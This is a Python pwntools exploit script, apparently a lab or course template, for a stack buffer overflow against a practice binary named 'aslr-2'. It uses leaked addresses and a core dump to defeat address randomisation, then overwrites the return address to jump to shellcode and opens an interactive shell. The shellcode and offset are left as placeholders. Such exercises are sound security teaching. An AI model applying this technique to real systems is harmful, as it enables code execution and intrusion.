#!/usr/bin/env python from pwn import * # Please use your shellcode... SHELLCODE = '?????' # open a process p = process("./aslr-2") # read output to read address leaks data = p.recvuntil('name:') # parse them. Split by newline arr = data.split('\n') # split by ' ' ar = arr[1].split(':')[1].split(' ') # get the address values and convert them into hex integers ar = [int(a, 16) for a in ar if len(a) > 0 and (not 'nil' in a)] # print to check that... print(ar) # generate a crash to get the buffer address... p.send('A'*256) p.wait() c = Core('core') # find buffer address... addr_buffer = c.stack.find('A'*256) print(hex(addr_buffer)) # get offsets... # By running this multiple times, you will get a fixed offset.... offset_array = [addr - addr_buffer for addr in ar] print(offset_array) # leaked_address - offset = buffer_address p = process("./aslr-2") data = p.recvuntil('name:') arr = data.split('\n') ar = arr[1].split(':')[1].split(' ') ar = [int(a, 16) for a in ar if len(a) > 0 and (not 'nil' in a)] print(ar) addr_buffer = ar[1] - XXX # fill your value here... print(hex(addr_buffer)) # [buffer - 0x88] [saved ebp] [ret] buffer = SHELLCODE + "A"*(0x88+4 - len(SHELLCODE)) + p32(addr_buffer) p.sendline(buffer) p.interactive() # backup code... quit() p.wait() c = Core('core') addr_buffer_from_core = c.stack.find(buffer) print(hex(addr_buffer_from_core))